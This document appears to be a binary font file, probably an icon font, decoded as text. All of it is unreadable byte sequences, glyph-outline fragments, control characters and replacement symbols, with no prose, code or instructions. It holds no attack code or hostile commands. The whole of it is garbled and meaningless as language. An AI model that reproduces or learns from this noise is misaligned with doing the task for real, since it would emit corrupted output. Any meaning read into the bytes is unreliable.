3LT6#".5462#*.'&547&5472632>34&#""'&#";2>&2"&4�#9	) 76-*#1*/*&1"'@(",0+
"(*&00/d##�&$$;$	(7A0
	.w#00#&
+V$&$$&
{%#76&+###'!2�a41<a;S<a<-t>$%
�����`--=����!'7#3/#3?#'�#����56/ca���t440�>&L�1����'73?!7!7!7�@�Rt���M�����PP_),,aR5R����.AT%#5"##5"#723>75."#57536353'262>54.2>54.#6MGB1
1	X

T
1
1 
�
	
! �R5,DCCD:�4ONMO:T`
	�	


2�$'#"'&'.'547>7>7327'&j,,�*'
j,,�*�Ǐ�D$#
	Z+%CY+�RQ������#70+"&?'&6;2%+"/>76;2�F
AE,A	�[B\H)
B�|	zL	V��	�6H	���� 12#!"&54632767'&+"3%6&+";26/���\0 .1
/fB/B���`��	U7	6W�	�x	w���'7'7757'7�����������������LUTTUTTT��UUT�TTTTUTT��~�%'?'7'?'#553!53#	���z��w w4��(��(�')'.��$T%�����((Px��x������3k2"&4264&"6"&462"'&'.5&47676762><.'&'.*#*:3:>76�`CC`CT>,,>,�\C=�=!
!!=�=C-#)(#
#)'#3C`CC`{,>,,>�6�=C! �<!"C��#('##)
����2#!"&5463264&"264&"���F5%%5%�5%%5%���`��%5%%5%%5%%5����
#$"&462'373�A�9�Α��-��"�"bqΑ�Α����44����!23#!".'454>7#�
D��	D!��
�_
��֓���:�)#".=#"=47>76;232+7665!*>
/
*(F
T

T#!	 
.,�
DB%
s
R
�@
����72#!"&54636/&'&&=32=4+54+";32���44,	1&*���`��(
S4H
8+Z��}�(%"&#"#.'&5467232>''&7>7?=: ./1E.8938 %&�?&P26*'?F	(n&( (����7#53537#�������b�������"�@@�*$"&462"&462?654#"&#"'&#"!.����0
1:AA:1
0?N@N��S
UU
S"xIIx
	����k~���
)C#'476#"&"54762"10'&'&"#'.'&'&76'&5476767>7&767674.>32&63"6'&""60'&672676&367676'.'&#""6&/&'&6567656767636'6'&'"&#&'&''.'&'&76#%4'.'&'&'"1767>&72132767>2#"'&��

%


+! 

!

�	
0


(

	
$29#%
	
	


	

	 �E��
	
.3% "#"(#*%9		)	<
	��5$	
2#1!.2
 3$
		&
#



����".6<2"&4%6&'.>'7&>7&''7&'67&�Α�Α�:#		IKG'd3+$"7�0!^e$�76H%
lnR.t3
 =Y�M?E��Α��*
JR#9C&(,9!A�R<8.
 �%MSK.4ZP����S%#"'#"&547&546326322654'&'.543232>54&"#".#"�B.&UxB.&Ux�-C[*DWA		



G�&.BxU&.BxUr-)9	()

	
&��t�?2+"'&54636&+"?>;2>7676&+"&=4>;2>5C0	
S�
�	Y	I
Z	j� !�	��J��l%	
������#52#!"&54=46354&+";26754&+";26�!��!!�SS�Q
Q�!��!�}(!����{������2"&4>&'&'.�Α�Αk!&"
q��Α��Q	
	
 � 4`M0+".'&#"#"&'.54;2326=.54>;227>?6;2!)"
;


(/`$"-;=]$		;JD3	


&!
84.[0


=`	
W	
t<	�
&0>JT\6&&676&"&547676766.766&76&&6'.7>'&>&7&76�
&3
�U�LH<,<IB@D4	_@@S_@@E2U&%J7CA 

< c
		
9$

��L=CLH'155+.iS3DS3w
.Z05R��	53	

		
����	&54>7"'>77.=�RB:6^:)?8-??-7!6'XvR� EZ=iE
�Q..QX3?M)��\Z������R%&/#"43267.'>67".'665.674>2/>�21-a90Q%/,7%$4##&
#*)

&&7�&'
>H;3	-'

$,

"$$6
*+(
%2)%
����7!+5#"&=!%5!'2!5463�&W�&��d�A&�d&t'ZZ'-UUnUU�((����42#!"&54636'&6&'."6323276���P2B!
	-A@���`�?N		 *f
#!3TR����+4BKW7"&46;462"&5"&4622+"&54>3462+'"&=46322"&=7"&46;2#^&/''/'/v

3&/'
/'/v�'/v3&/'
/'/v

��&/''����/7AIQ.54'76&#'&33'76&#"#>32"#"#"'76546"&4624&"2>e6BeL	"8!/M	#^7S=�A#$�:0A<�Α�Ά�ċ����g>-"4G�		[��,48":�	2/7:b�($Α�Α��ċ�ċ����%.546777'7&'57DWumS7EM:D��%(E3# R85Q
+	8$&:T!���+����3#7'362#"&43#�]�^'j`8�0"	"|h]h3��Z��"	"0�����%#"&4632.32>7#53�kg��gaEC YM7Z@#7���j��ΑAA!M2A\#"V����;IU6"&5462$"&462"&'7264&#"'&&#"32>54'>&6"'&7672"&54>��Α��

$28=2$	N61$UL
C�

�Α�Α�
NV
(7$t
Y


����
%5`%"'&76276'#"&5463272#"&5467#!"&5463!2"&'73264&#"'&&#"32654'>&RHW[���`d'6;B6&T:;Sf1���`�
U]!	*<<*
!����%92"&42754&""&=#326=405#"&='32>�Α�Α�",>,

:,,�:

",#��Α��!


+*l

-.,+kq.0

/
/+#����1%"&=726='54&"#"&=332>=462�B]B"4�B/.BV
C[C4�F.BA.FGH:�.AB.FE
�-?@-$����%3#!"'&'&'.5463!225#5#"3326���	`��	��	|��
`����	��	 `	!%)53#55#%3#535#75#53#535'35'3#3#R3�RH��RRRͅ�R�4444L���]]��))]])��)�]]u3�����	#2B#"'56322#"'567#!"&5463!22654.#"#754&#"7532�

G

���`��+"-3�+
4!DiD���`�/ %	�
3:B.�
3��9�@D����7'26322/>&67>77367>?"&75.#	&'<7465&#".'&'#"&54?.>3263263232654.547'6'632763'7>31#��	376I
	
G#


,g�;
#,
	"	?!
,�	�	0
5/)



'�	E<
��		-


\���	PK<	
3		! 

4.

"
	

#C�3^ ����(:T#"&54>767676'&#"&/"6'763276&'&"76'&#"#".#">2@	&pNNt&	(
 +
$P&	
	
V

=
"+#3(*	
0M,E'RhmQ%D*#&
��	D%**"$

1����1Je46326&".'.7.67>>32'64&"#".'&'7264/7'#"&5467&72767#!6*,
d,3!
�V6"#-,
Z�#9,d-[(b0'(7#,,

Yd#*,d,2"6!_U
#!8--
Zl!#

,d,[	(0'(#!7,-X@u397+32'3254#254+%#53#32>73#"&546323&#"�AH5��q�O/5
:8U���8�!>\<GI::C�s3 �H34cX3NS+(�/3b�#� "VJ<;MP7����
#'3H7+532'+5322#>7#!"&5463!235#4'654+32674&"327##"534�-.+(�?���`�NN+#>Z]'�$?(
2"	"d�47--���`}�)

0�+ +* /
#����!2:B%#"&'326'7654&"&'>32>&/6'&'6"&462264&"�BsCU�_&*T(87M7;��bg���

 	(	�3%%3%R''�CsBeO' +<8''66'V
7`���
	(v$4$$4&&����6>I>&/6'&'2#!"&=326'7654&"&'5463"&462264&"�&���Y'O%53I38u0""0#;%N&&^��q%(84%$33$Q
0��"0""0$����.C2"&42654'&327672654'&#"327672654'&#"3276�Α�Α]	
`�

|S Md20
?0$	
R{B4

<�5��Α���	9	2B
-
L
0
��@�3#0#57'#53?3@b[�
,	]]V�+	bc�
�	T	]�	�	T	5�K#-9DN`u�����7#"5'743272#"5'7472#"5'742"5'?2#"5'7462#"5'762"5'?#"5/7547632#"'&5'?47622#"5'72+&=476326%2#"5'74'2#"5'742#"5'7o��	s~!..!�	7O��.�AEEA)iEEi�DD�`####9989DBBDFDDFr�@  ��:B��CC�8/ !.	�	I6<�AA��CC��CC�����+%#'.'367.54632&'654#"�O*+%$
J
;+-%+7/(0

"L�44\
;K~Km�5,>N12A)<:

.:9��� $(+/&=4?67'775'?'7'75�

��

�
_MجM_�7�_M�NNNd�M_�7 �����;g?3ss3?5J%�g?3444�s3?5J%��A�$I%##"'.'&676'&76067>6&'&5.*&'&35236'#"'.'&67>76'.5676676.&76�"	$#�J$;
'&/("MD7
+
"/26(&"#
D��+;'I!
,!%B'
$	"1�D$ 
."#C1)6%	(�$X6%		
('B<s L
!
		&&H	
%	
/,
����["&7>721>?>././76&/7>?>?>./65g�<7
		

-,		


(�8�h<i#36B

 
	
	32
	
	 +3
	A911D+m�	����)6CKSb�&#5&'&'&5473.'77'>7"67527'676"&4624&"2'67'654'7&'"'7&'&'7&47'6767'6327' :a

)=�

�:b);

a:=)$b:=)o�Α�΅�Ċ��c

�

4	@@	4


4	@@	4�90	.�	2991	w90	
/-	09.�
	09/�Α�Α��Ċ�ĊW2r1	�CC,,CC,,����
"*K]}7&5472#"&6%#!"&5463!23254#"#.32>54&'&#7654'7'"=#37'.541535#"545#23232e
!!#
O��`�1$@ 0	
!	U
4He&$
r
|���`YD
 XiK
=
B���'4<R]&'#"547&5467&54>4&'"&"'6'26&#"527>=4&'733'".5432#"&=4&"#5>73;#067�%"

%:5f#)-(
453�T?	%%�!!$	
&9="#

#&2
,&
�	
	
�$##$d w!� �	##�#j%	>)a����!!77#.'#3��@�Q#	%P��@�6�-/0"�g��g�-'&67&632'2'&6654&#""'&>H	77 !;k�Eb{Q>jP9%>"
	'M0_�93!!sDbENeRC9P$9G#	(VG-����2$./"'"'&67.5'"&6767&632�n##m 	
!QRQR!
7	
7
	0 Q^yx_Q 0
��3�(6GS"#"'7&54632&'"3264&264&#"'#"&46322>54.#"32>54&#"�E`
1DNrQGq	r

��D6(F``FBc�
o
Z@	";7ME`N;5



0



�=40
SuST!		����F^2"&462"&46'&7<5"&#'&7&'&625463!254.#!"636626�3$$3$�3$$3%�#G6"(&	&("6H#g
��B)

 *D&!0""0!!0""09*f4!
*)!4g+
�
��	�
����#5##5'!#5#5!373�&D'}o�Mat���WDMYnnnng��[[J���@@���!0?O7#"&'&547632&54?6#"#&7&6#"'7&?632%67232/&54+dl	

1
J	+mi"	Zk	>	!��5;

"	h�1  �	Ro	
�"'
�[�
�	�������"K7+"&7>3262"&7#*+"&76763:>7676oK;H$
*m�$y@
  �s	O,Y�BpW�	����
)&'>&42#&'&6373#&&'&'&6;2�507h<�m~r
|JYAUM21c2
">LvnM	X�¦nfja��JH��@�%)HS%#70>?#!"&5463!27#/&'#37#74'&56367&#"#"/26'#"3673�!m� ��X@+'@$�(�"$'�  <*4�&+���`��jG���2
!

	#�
���@�	
4BR^d���������
-9F$"4!2#"462#72#"42011"1"1"1"1&1<143413030310030410+353#!"&5463!2327&67&#"64'4#"&#"5#3<>323<>3237#&#"327374&5427&"'63'=35#5##3734#"7'&7&5#3546467&7'7#&737&5#35467#&7373535#45&1&0#"0#111323210606107#'#537374&#"326���xuuJ� ��Q9*#76#*9�555Y	-

(	#


	:


	5"

*Q9*#67#*9Q1	Z��`fsQ-�,�)�))�v%	
	
%	
	%	
	 	
		%	%			|~U:Q-�-Q��@�'3:BSkuy��%+53272#!"&54633533'654.*#35#535#535+37#&"264'&75&546"'654&'&5467&2654.+35#5!26%+532� �
:-r#$;%%^! a

,
$l
[�3�z�	�*		�
���`�R!!#RTT7:%%
/

	




RRR�� i	�6����A�.7:AMN`g{~1Iamxy���#<.+#532254+2*##'#5377'#3#57254+'#3#3#53#54.+#532254+'#5#'#'##7353733':>7#!"&=3673353>7352335;67323535#&'#&'#"1#"5#.*+.'#.'#5463!2"#"5*5#."&*#&+.'#3673465273<523272?"+73254&"&54;254&&54;#"6+5'#3##53'63023"'&47'3*;735353#'#'##"543'3#E'
!BC3)$$j?

'&&'77I�
'�"#��
� 5�B4)(+ (g.(�#		O

:SR
0'�$	  
!W	
!	
 
'&&'889	""!Lp
	EZ	E6
	8	�Ej EP6666EBB//(�Z�						\	

		
&n�]
		
<	
(

(
E^
7BB11E44"#(E��@�	,AXr����7#"54632'2+743!2+7437#!"&5463!24+";2?46:3267#"&#"327;2?47454+"'&+"0;274+";2?>:1267#"&#"327;2?474+";27'2#"546�

	j	 �� ��@"(T
%@
�"(T

,J

�	
	
!
���`�f

@b\'&nf

@!h1	


��@�#@PZ^bq�%2#4>2#"'5672#!"&54634.54325&#"#"'32675#53275&=5&'#3565#752654&#"'#757454&#"3275#"'�
$	q


�� JE#e
$
=$$$n $
�
�		5���`�	"			"Lr
3!}U
b}}��! "	�(	3$
	1OX7#"&546323254.'&54632&#"	#"&'.#"26?�#>BD@%)=

D<-^;+


zFE
) (&		Q
FCFM%<-'J#
	

Q60	(
/3*	����g2#!"&5463254.1&54327&#"2#"'.	#"326?'#"&54632���L	$:%+
&.		
(+#
		
���`��3	/%.
0,&
  ����;G2+#"&'#"&46;&546324'!"&463!.#"!2#!326%32+"&46h

5�gL|C

5�gL|��

^8Su*

��^8Su���

�
 g�TDg�TD`/9uS/9uk.����'/8E��%#"&547&54632&54>32>32654#"6'&"32654&>&'.#"723201&'"##"&732654&#"32'67&[!iVF_3/%7
P!"/�."	=0�
Y!r(
1
	.	C-A6	�0&Xs\99#��3%/^�xeC�
Q\�P:(
'!	;A		

?$!)/�����#%#!"&5463!2#37�+V��`A_�_[p)��`��*��[[
��3�JMR_finquz�������������%#"'#"'##"&547'&547'&54?4&14?&54>32362363225#7575'#075175573'7'37'77&='&'#'#7#"7'"7'737'37#3'#362?#6?#747'74547'67&74kj	476	8jj8��,,-,3483,.,rb@#�PSPY|D"uSb:�9
h3�Kx63)O<<$$kR#[c�i\&\a|sZ#V.#�
_Z	Y_
\
a`	��L30?\4Z`�H!<KfC��RXT\G�|Xed<=y66G6QS+U?sL&2;V�_Z__S\=lO�����
7+"&=4633'54.+"Gf5&�&55&,�3	�
Xh�U%00%�'7��5{		
�
����	'7&54632%&'>7&'677&'>7�\\�gq�!!�p$74(-CyU�#"�g�\�$�a!�rp�!��0>}B-k#�Vh�":�%:#&&#"6326"'&#"&#"+632632&#"&#">32632�8/-:8C,0=*)�$"75>))>57#"*>G@**@G>"/6>))>6/"!18//8#9Q�+)��))]##��&&��	��z�,<M]%#!"&5467&54>32>3254&+";26754&+";26754.+";26754&+";26)5I2��2I' '[:Ec��				Y				Z			W				�
C+3HH3$<&8HcE�o		o		�		�		�	�		�

�		'����#'+/37;?CGMUuy}����������������?7?7'777?#5##5##53#53#53#5##53#5#57#5#53"&462'6#"'32654&&543237&#"'#553%#5!'%!5!#5#57#553'53'#55353'#53#55#53'#5d����,r�"
"
"�!�"Q"=!�"��Q"$"�L66L5�!	 	ya��*�����z��z�"�!��!Q"u"/"&






B
	


>

g















��""�"�5L55L:
I""�""M!!0�jbb��U�;;�!!+!!��!!+!!xM""�""�"""��"*2#!"&546;235463264&"264&"��>j��7''7'�7''7'���L((��'7''7''7''7�|Y%#".#"327>32#"&54>3232>.#"#"&54654&#"#"&547632632�D26()!)'5*9
<+C; S(@Z)F*!<,,"'%.&		%	!
C2(&@3%.Bw1B#-/,$,>>,*"R?*E&",/,"))	2A	,%3	>����@2#"&'"'&54>7&547632>54&#"#"&546�Ik$=&(		


%	&	A5<P	+{�\I$D:",

0	Eh	 0
K 214:N<,>0Pd���� H#"'7&546322656'&"77'&'&5476323217676}C�\91v �\\\Ln96�mF+�
	)1-	!
_CZ\�s3<\��imLJ86lL5-D�?	)	
����3#3#'#53'#53'3377#�00DRgYYgRD00@Q^Q�6�p0 0��0 0p����@����(!!5#'#35'&753735'&75&7��@tS;DW Z O	Cv��@V��"�&&s��������!7#/#3��@�N!.-#L��@���[
[�^����B������������'8I[nz������%'''.567&667&674665".'&7>762263&'&'45&'&67666667&6767&'6:>5>"23636#6666'6&'.6767&'"#276&67&54&&7&'6757"2654&&#327>'"#276464'*#'7>7>7&7.#'&''''&'&'65.'&26'67&'.''&'5767#65&'&'&7&5&'6&3>.>6&5467"&7654'64>76&%'.'&6'&'&6=3
��3	
!	
(
!'%
/�T'
	
	N
4	�P
2

�#-?,,T"5#J	$a8
KQ/K*
	


1
255+7S
98��717�2
$�B!<4��
%� 
%0��
%
	
))	"

G	"G%
"$	
	
�	
!
'(!$
	!&'	("�# -- -�# .&

$6 	( O
4*!


�
&	O6R
		"3%& �
 ��	

	�#

�	H	
	+����0$"&462"2"&42>..'�&&�&&Q';('33&XQ:aB9*e�&&&&)#,8%'
 ,)����#3?OW_2"&4#;2=4>;2=4&#"54&+";26'+"=4;2+"=&54622"&4264&"��}}�}t		%$		9(-����		�		�Α�Α�������}�}}�		  		(9-�

����5
		

�Α����������@� ;Nc%531"#527#!"&5463!2##"'232>4&7.675&464.'>54.'+326�&

((h� ��v9
�73!"651""1�	
	u{� 
#���`� %	!!
2
=
���@�
'62"&45>54.'72#!"&54632654&+"3��gg�g� ((p(�� OywQ[5X4rOpg�hh���9F8

8#x��`�`qMTn0Z8Np����)8D7&#"327#".54632&#"327#".54632'2#"&54>2654&#"�!
!!	,
-.�!	!!	+-.yi�)EZ0f�?sFQzvUVuw�X'"(%$X'!(%��h6^?%�gBrD�=sXUvzQSxt7'7'7'7'77''�gg��-��4M���-��4Mg�gf��-��4L���-��4Lg	����2"&47''77'7'7'7'�Α�Α�JM5MM#~�~~JM5NN��Α���KN5MM$~|~~KN5MM@y *5=E1#"''#"&547'36323264&"7467&#"264&"$2"&4$2"&4/U;9)..)8<T./iReeSh�(P99P9�=/4893/=�(99P:,��**>**
+?<T&22&U;?+399�:P99P+/MM�:P99(,�****��<�(4@%'&'.7617&'.7>26?6%4632"&72654&#"!9L
9L
#	L; 	140
��L6#<#LlLB&4&&rL
#	9L
M


�6L#;$5LL5%%%����D6462"7#!"&5463!2264&".#"&/&?6/67>�  ���`��/D//D%	%
0

0$

/
#
�!!���`SD//C0�	
/

0$
0
����+2#"&=46367>54&#"&'.#"2��]]��")
" 

*"	��]��]��� '!( 	������L#'&1.'.<53>7.'&#53676.#<5:3.#5�'+&2RJa
0� j
!;-�		<)&;@z�(
cZs)��%7�80

�
8=
�

B7.



{	�
����
.6FRZl~�������%7&2"&43237654'&#"'32?654'&#"&"2=32545'&#"264/&;24+654'&#"#32?654/&#"232454#"32754"27654/&#"32>4/&"'7%654/"#"32724+"3mGTΑ�Α�q9S>B `IC>dt�tG	�Gm�Α��S)�Q��)o�t�GH���
",7'>32'&4>32"&%'76&'7.547�M#f7C:@!�)#&#11F1;!<P@Jp�M*?Zx(�v,0!%B!;&1F11|S�.%�$X!�')}�\J>�����%#"&'4&5&7>767>&67>"06764'&'.0#"0#9>3676;20230300210022110010101�BsC\�
-%\*=		$`#a04


�	CsBuYC9%,(9"b:1
#!)V$"	


		
����%"327#"#.546;2&&'>4&'>:=`*
&=W5.F_c��g^F-0G*76+GO�Jk~0K?�dg�?�sb~bJ���	�!*2<!673#"'.546767>667&734.#"7654.#"�&��/?DywJF ">59O5E�Qap�I
	#)IY�/*=�C- DI$3 DN&# Q gFOUk+9'�%9!
*�,6�J&���27#"&546;%2+6''.'.676767&'-
P:
�4>�7#

$6� �/*A|0#>���=g>3E/;73!����J_q�7&6765>32'&62>54&6764'&#"#'&=4;2+3>.4>#".&6.'&66'47'&>3276#"'#"'&g
9((:O2	$*8'Z &&'77&
��%eU;%9HD<0%,-.
%0C#	�1�oT	
5IRR�		h
	^%79(1;	&	/ &m'&&	
�
�("Q5*E'
1*

��1&_?0J%�

����-6Nd<.#*'4632&'.54>576#".'&62>76&7>'&&>76	
JI>.9&
.2-%3%T
�$T/0^37&@9J'$	*

&
		(@�
8$+ ,W)7	
�	))


&
����	%##3#i�m2�u��hV������&#"'&'.#"'>76?676&6�Y[?'		
(	4"!]E&ArwI#-)0%
L�5-l����
!!%'7#��@<@@�@@\��@{�VV�Y����,?N!!274&#"#3235'&74=37#4754>35'"454=#?'#'##77��@�3#!�,8DSgPQ		 ��@3
	%oq%

��l�

!����*9GT%2#".547.6326?6632#"&5'632>54&#"6'&"'&272>54&#"�	{X9a8	9O	aXP9��
�ky�&1?Y)E*

0'(�	!}'ihR
����@\#"'&547654'&#">320#"&'&767632.%#"'&'&76732767632�  8	!.L/S�YI{�	
Iy)/=*$$ )- c #%#5(fF$!
:-) 6	0#2,#UoC�oNA<:+ ##


1GAQ3:IO
<T
����-%2+#5#"&4632'#"&546327.#"326�
WAX2g��gGp#��=+O>WW>H-;]7[��[:b�,a�.C&�ΑIAmnHW>>W?#/5���;����%''7'57#d%��S�}�.*�}���TA�`&�:��:�����Yeq%2#54&"#54;2354;2354;235435&4663232632#"&#"2354;2354;23543%54+";2754+";2��"*"�$$%	

%%$�����``� �    p<&    � @@@@����Y$#"'&=#;54;2+"=#".+#"&46322>7>23>32#"&'#"!546�Y�
	Y		Y	'e&**&			
	6	Y�
5$
<"		Y		,6,*:*
"	!<
#6����$+5326"&4624&+3532FFFȑΑ��3$x2F$�JΑ�Α�H3�J�|7FU%#!"&5467>322>54&'&7654&#"'&#"3$#"&764'&>#"&764'&>�"8'��/B7*X6A`	J4%?
**
%	"
	�''8C.+?3?X�


4J)!	);)x�8	-l-Ia(	H

����:7&54636'7&"76&%#/7327654'&7466*^I"<53%8C)G!G(

4RmR=#!@P_"*&�3IP
H'%*#	6$*+),IH'0A( ����&'77#".4>327''77%+*|,..C97D-,B3�O}J]]J+V��V+Y3O7&	6f�i89gKX��I^\I����'�7''7'75#'7�b�VllV�422�g��V ll VΝ2djd2�����1#7627'&73%'#762i9�8f���^���88�9�����X�ڸ	e���
	�&�������!)-%#"&'*##".67.>2%35#5&''35#�7#77#7!=ZfZ=!��**�-e)&lm��~8//8&TJ;##;JT-:� "j:	���� $(+/36:#!"&5463!24+''#"3!2#5#5?##5#5?##5���j%	o==o	j��IIIT6v���p@v�cu��j��jK22K��%%J&&�,u%%J&&�,��%%����12#'".'.&56'&'&'.V�P5QF! %&#D
	$GI&

%6(�,>=E10RG	.A9l
,!�	g,����i#"&54676327#!"&5463!24&'&#"'>54#"32321/4>14&#"3267>4>7632�	

���`@		
D+ 

"3	! +
,(0
3��`�"??%*) <

8$ ����Ha%#&#"#"&546327674"#"&54>32>32'654.#"3:>76�#2	(5R6(./

	BI%R6$0
�	
�7

8Y1'6	*-GB-XA-$f
	P		M(?������1F&'67"'.>32&#">54'654#"'6767&547>.%$
3�3(&Y;!:N3!#1	m;Ob/&KB%
0**JMX�
CJ88*p^B	T:";'AUM'79�DR;$cI)+
!2����@U2#!"&5463>''3654'5.'.5463267&#"2726&'>7����

1%D

'1$%8 c<
)	.���`��H%3+U$"#!	1./6(	0 $5
);F#�.>	

����h2"&46'.'#&76763654'&"'6'.#0"1"#"'&3263277632327>76�Α�Α�


 			
,'��Α���	

<
<
�����l%#"&#"''.#"#"'.5.'0547>7056'.'&7>327&47>3023232761�<	("*
			
	
%(	/)

$7								
I$%I

	����n2#!"&54636'.5#&76763654'&"'6'.#0"1"#"'&03263277632327>76���Z

.	
,'���`��	


<
<
 ���� )632654'67"&4632667&#"�o
$&3)/Ih-
;z�zzV6/B��\d%(Ih�JV6?#hIC2
=TVzz�z7���^hIR����GMSYc?27777''''"'7&'7&'7&'7&547'67'67'67'6'7'7'5$"2654
�
-
2=
@DC@=2--3=@DD@=3
-
���������ʼ���bb�bۄD@=3
-	

	-3=AED@=3-
	-3>@D�����uu�vvPm�nn�;bFEccEF����.93#"3#"&=4>73	5>574&'&'37#6734'7[��++)%6*�C(

		0!
>2��
�1=t)�)5%�)82i@E&(
3.GA1����.
���
Xcu������462#"##"'"'"'#".5#"'67&'7&'&54>3267>761>32632632$2654.#"47327654#"&4&"326574.#"26574&"26574&"2657#"&5476326262632>74&#"32>6�
	&N
		 	 			
" $6	$G'

-

��
 - 47)	1
	12M/?!FZ%"			 	 		 &3)-")R-_

	� O- 				7!25$" &(Dt	�!B6#
�		 
	 		 	

	 		 	

	 		 	

	�.iH2>.VN�*?$�)����%12"&426=4'#3#".546327&#"%35#5##33�Α�Α�5BuF)- !"13II##$$$$��Α���D5

+
 .! IfIj$##$#����=2#!"&546354#"#"'&#"5654&"32756=6276323276���.(
%"

&*
 ���\��	
�-
����BFJNRVZcgos%#/#/##&1'&'&?&5'&?&/&?2327674?677'///7'75'??'?�
7CTA&{Z"$#;F�e[yj�IP9@
F+:
>NOU\_BX@)J3�H,!6.CENd
�',�# $&9a=/�79�1��=^:�=D<�>F=,DC/DJC("?$A����4%#"'.5463232>5'654&#"327.#"'632�(;%:tKxNOwJ
r588338

+!)=	">(dAUpoV_:$

:%?PNNPON

>�Wp#"'&'467632357>7>'0.7>./.67>/7#"'&547674'&547632aAC
4 
~]

		

!� 4
CA
`?[e@	$Aa1J%���>('4
,
#%9*
)  �%J1b@$	@e[?����2"&46&762?7�Α�Αr�
=�s>��Α��]Yh?.
����2"&47#�Α�Α(U�U��Α�ε������.6>�%/&?6''&766'&7.7627&76"&4626&'.>;4'>4&5'676&'&.'&7&'">374'&"417670.#636=4'#&'6767-

	N
!	)!
��Α��O
	
	

	
2

'	/].('�
		
	
	$7Α�Α��
%
	 
	;	3		

!5
n*%#����X%&5>56'4.'57#.+"72>73#.'&#;2>7�
��h	
�X	C-Y
d<H�r~		
�
KI�'
	$����"3CQ[2#!"&54635#35#&'#353732326'454'.#"+54.#"5#3732'#52#"&5432���L!�++(
.�
		uU���`�[���<)�UUWW*


c$	
*�
\1T!*

����Uc%11"#"5&1&'&'&'&'&'&'&'454767676767676767670723135"5#35463�
 	
	
	
�II�%			





 C
 �^����7\2#!"&54636&'.14"&'&'."04&'&7676&"&306/.>1276a,8'��'88'�*$	

/	$|%Q)%/�,��'88''8��IQ&/)

HQ&
/)
����7&7>7>6&'&6�W?_E#ZZ#W?`E0�4P<'D,P<;Z�W>VFe	W=WFe	�;X"@'<WN���#'"&4624&"26%'#'#7'7''7'�Ԗ��v��������W%W�/213DEDm77*Ԗ�Ԗ�\������%W%R^ddk
|D7�����'0=DMm��6&76'&'&76.76$&'&>.6766&'&>7'&6&6.''0&'&'.67&67>6.'&6'&'"'&#&'&'&767>7667>763266.6a
�	?�
1�m

+
T		FE&#'f*3T
^(+

	
		)		%
	,P		���		L�
9	

<	

w!K$
2?#J2$ A5
@`
b
"k
F
"K
	S����-=M2#"&#"##"&=&54622763232672#!"&54634&#!"3!26S
('
#"
&<��j��\�,�


	

���\�r\��	����)4E%&?'>.#"'6?'.?6176&"&463227.547�

)*'1''#.L+3 
D�:j-*�'FA6!!(/��
z $>-'<2#' V.

=Q C�*��('A&5*'8.������1S%01#547>73&'.623632&7.#.#&5&7067672?B.,]rvy3��
::�q�
z	���	;9v
�*)"%txBy+	�/	L""6
J4���AX|��2#!"&546367676'.6'<.'&67>4&*#"#"&63!22654*#".6767626325'&'&7>0&".5&7676��;�';1C#@=		73	��		�	*
	 )-4	%#	5��E&��|��
'!"			�ZG
	22!.;32H-"�����&>#"&'>76�MU,MU,!I}J=l&5V
$7�k4!bj4 ^
K~J4-F13!T����"4EM2"&46'&'"?2#!"&546337632=4&+"767676/&"264&"�J44J4�)�#��##-T
BiJJiJ	4J44J$C���##J#U-	�JiJJi����3I2"#"'&=#".5<>7>754.#"&'&'&76532�a_@5X"0
�D(V

L�E(�I?��		&	7��k

��0�NGV_cf����%777'77?'7&7>721?6?77?7?''&"76?6&2>77'/???>761?6'7?7''7#''767676'&76767?&'&#7'�###"@/ 
 x

��$!%
'%A$$%%6 	K
:(�		
;
��( 9
&		' 
+"%	)&�p
"?��qsvPS�xx$&" (uoV\>

&	B<	&(Mzfh?B)
 +.N--+$'%' *(?BO@		
&����"7?K7>32#"&46;7'&>.?6732+&'.'&67&2"&44&#"326	W?�		4BF�5		2�Α�Α�YZ~YZ~G	�
s$	�"	+"	V%	��Α��gZ~YZ~����2G2#!"&54637&676&+76.'.#"3!264&+&'>/���O�>V		A34+	3���`��!=
�#rJ$X!	V�!,AMan���7254#"#47632#7##"&5462654&#"733>32#"&'##74&#"32673>32#"&'##74&#"326747632#32653#"'&7454&#"733632#454&#"#*
&	%,
''
Z&	'Q

:&

	'Q

	
5
! L&
#&M]'	#
'�		L0_
	%(
	Fl
O
	%(
	Fl
# 
	
3		.		D��A�/7%#'#7'#7&74767676&'&>67'?If.!�$!e"E*;f!1+2��I:rkrTWZ�`6M&�Of!$!�nG
5%"37)*= 
!.S�N�,2.'7!9�z�5����*+%%57.#>32632&#"'>32'.�����@~6�D[5#B5��#<<#."4�)�MM�)11����6��6ȀG8*2)1110o?II?DAT�����02#!"&7>37/>16./'7'67�"91��"91�_
g	E:4)s�)��))4)��w
qd
0=
@n������/<e���7#*&'#0#&7&6256&"#&47>323226765&#&/&5&1430367636763:'#/'"'&=47>'.'.5&632#.#"#"#"&'&63216766&&7>&7�
&),(V�
2
$!!%4!!�!	
#	
'	
	3�CY�?��~s
	I4&�
	
"

e
��������	"
	#h&)?:T0			M����#42#!"&546354&+"#5#353;26'+".=46;2�

��

@(@@@@
9@(@..�
��

�
��#*('K�#'(H����?Rg"&4626'7'&'7'&/022130"''&1377676'6".#727&".'72��Α��=%
	
#
"3(9	






	
'Α�Α�*-+,-	3H	-,--	-6<	
Q6����
)5O62'&"..7>7&67>'&6'"&=462746#"&=4632>NG�I?�>i`b
UT

�	
OR^�			GE11E%"!%}CG=:�e�`
	T�
�Q

]�1		H		�

G0++0G

!1! 2
s!)2:+73272+72+732+7%2+72+72+7�"&GD~!%F�IF�GFFF(	FFyFFKYY�1Y1Y61Y�	1Y61Y����>`7>232"'.2"'.76#"'&'&'&'&547>76 '&'.'&54'&'&'"76767>�	

9C)	04
��
I!V"2+%v	�
X�	
�� ���.:G S������&6G%"'.'.567>7>3%327654'&#">'.#"?�
�";	- '48%(,
��	--
.$�	CB

TM��%

3%-L^
#5
)22	�

����#'+/37;?C3#75#73#75#73#75#3#75#73#75#73#75#3#75#73#75#73#��xp���xp���xp����xp���xp���xp����xp���xp�����ppx�ppx�pp(�ppx�ppx�pp(�ppx�ppx�����#$.>.7>7>76.'6L)5!)58Gs8	K8/fYH+�H5K;+3��5!*5!��P~F@e$>]4m��"C2.
)�u;����'/6"&4767&#"&546326&&2"&4264&">L


$'7L5-'UI�������^^�^&X

8*	6N"q߃�����^�^^���M�
 %#"&462'""&54632654632L'"22E1T".0G12"#)5##--&1F11�-#".."#5)#"21F1��q�)Xhu��7#"&=46;;2>=4#67>76#'&77>76/6.'&.&677&'#"&=46;2'"=4;2#754;2+"+"&=46;2�1/	.*75/62
G2$q%;Q�9,
7$>4R60 

&>(D�(

(		}


�				p�(		,5
+Y1+9%">,%)&".#@/	4C3

93$
�
(

(
(


			T���
